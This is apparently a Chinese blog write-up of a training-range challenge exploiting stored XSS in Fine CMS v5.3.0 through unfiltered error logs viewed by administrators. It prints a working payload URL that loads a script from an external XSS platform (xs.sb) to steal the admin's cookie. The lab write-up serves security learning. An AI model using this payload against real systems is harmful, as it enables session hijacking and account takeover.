[zkaq靶场]XSS--存储型XSS

存储型XSS

靶场

靶场cms是Fine CMS,其版本为v5.3.0。

image-20210322201725598

image-20210322201809628

搜索该cms的漏洞。

参考:https://www.jianshu.com/p/200ea62486d9

image-20210322201938475

简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。

当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xss,从而窃取管理员的cookie信息。

漏洞点:

http://59.63.200.79:8082/index.php?c=show&m=test<sCRiPt sRC=//xs.sb/i4MU></sCrIpT>

访问上述地址时会发送错误,

image-20210322202612087

借助提前准备好的xss平台(xs.sb),在此处直接写入payload。

然后在xss平台查看项目(创建项目选择的是老版模块)

image-20210322202859705

成功获取到flag。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值